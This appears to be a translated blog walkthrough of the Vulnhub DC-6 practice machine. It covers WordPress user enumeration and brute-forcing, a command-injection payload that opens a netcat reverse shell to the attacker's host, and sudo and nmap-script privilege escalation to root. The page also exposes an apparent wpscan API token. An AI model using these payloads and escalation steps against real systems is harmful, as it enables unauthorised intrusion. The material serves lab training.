当前位置:网站首页>Vulnhub's dc6 target
Vulnhub's dc6 target
2022-06-29 07:46:00 【lainwith】
Catalog
Introduce
series : DC( This series consists of 10 platform )
Release date :2019 year 4 month 26 Japan
difficulty : primary - intermediate
Flag: obtain root jurisdiction , And get the only flag
Study :
● wordpress Security testing
● Local code execution
● nmap Raise the right
Target address :https://www.vulnhub.com/entry/dc-6,315/
Prompt information :
- Target support Virtualbox and Vmware
- Need modification hosts file , Such as :192.168.0.142 wordy
- The password book can be obtained in the following ways , Improve test speed :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
information gathering
The host found
arp-scan The host found
arp-scan -I eth0 -l

Host information detection
Information detection :nmap -A -p- 192.168.40.153, Only open 22 and 80 port 
Visit website
The first change hosts file , When I opened it, I saw that it was WordPress Site 
wpscan Test site
- wpscan List the user name of the site 、 account number .
Found some accounts :admin、graham、mark、sarah、jens
wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Missed scanning website , No valuable information was found .
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Blasting website
Try according to the user name you get , And the dictionary mentioned in the range prompt , Blow up the website , Get the user name :mark, password :helpdesk01
Prepare the password dictionary :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Prepare user name dictionary , It is the one tested 5 Users
Start blasting :
wpscan --url http://wordy -P passwords.txt -U user.txt

Log in to the site
After logging into the website , After a simple search , Found a host ping Test site for . You can try to find out if there are any classic command execution vulnerabilities . At its worst, it can be tested “Activity monitor” Is there any vulnerability in the plug-in .
There are two buttons under the input box , After testing , the last one “Lookup” Button can cause command execution effect 
rebound shell
kali monitor :nc -nvlp 9999
Bounce order :127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
Get interactive shell:python3 -c 'import pty; pty.spawn("/bin/bash")'

information gathering
I saw something on the target plane 4 Users , Go to their home directory first 
Sensitive files found , Identity switch to graham found sudo The possibility of raising rights 
Raise the right
Switch to jens
Ideas : Find out graham It can be used jens Identity execution for
/home/jens/backups.sh, hold/bin/bashAppend to this file , And then use jens When this file is executed as, a file with jens The powers of the shell.
from /home/jens/backups.sh hear :
- Enter the corresponding path first :
cd /home/jens - hold
/bin/bashAppend to this file :echo '/bin/bash' >> backups.sh - Switch identities :
sudo -u jens ./backups.sh
After identity switching , Find that you can continue sudo Raise the right , It's really easy to raise the right 
The right is raised to root
nmap You can execute script files , You can create a file and write to it shell The order of :
echo 'os.execute("/bin/sh")' > rootshell.nse
With root You can use nmap Execute this script :
sudo nmap --script=rootshell.nse

边栏推荐
- [translation] how Bink drives the digital loyalty transactions of some of the largest banks in the UK
- 【工控老马】PLC六路抢答器系统设计详解
- 1031 Hello World for U
- 101. 对称二叉树(递归与迭代方法)
- Use of parameter in Simulink for AUTOSAR SWC
- 【工控老马】基于西门子S7-200PLC的跑马灯控制系统的设计方案详解
- Perceiving healthy life, enabling boundless connection -- contributing to openharmony 3.1 ecological construction
- 1032 Sharing
- Vibration signal generation and processing based on MATLAB Doppler effect
- Appium 环境搭建
猜你喜欢
随机推荐
【工控老马】单片机与西门子S7-200通信原理详解
JMeter can't find its own jar package imported by BeanShell
施努卡:3d视觉检测方案 3d视觉检测应用行业
[old horse of industrial control] detailed explanation of Siemens PLC s7-300scl programming
Imx6dl4.1.15 supports EIM bus (upper) - actual operation and modification.
关于开发web场景下如何解决手机访问web跨域问题
TF. Repeat and stack operations of slim
Schnuka: 3D machine vision inspection system 3D vision inspection application industry
Software testing
tf.to_int64
Listen to textarea input through Keyup to change button style
cv2.cvtColor
How to talk about salary correctly in software test interview?
Detailed explanation of communication principle between [industrial control old horse] single chip microcomputer and Siemens S7-200
SAP ui5 Beginner (I) Introduction
101. symmetric binary tree (recursive and iterative methods)
HANA数据库License的查看申请及安装
Interviewer: why does database connection consume resources? Where are the resources consumed?
excel高级绘图技巧100讲(六)-甘特图在项目进度上的实战应用案例
MIPS instruction set and brief analysis
![[industrial control old horse] detailed explanation of design principle of pattern fountain based on PLC](/img/28/690f9985f32675f5d50d196c293abe.jpg)


![[FreeRTOS] interrupt mechanism](/img/ab/9b1d07048b4631d7cc95db99ed529a.png)





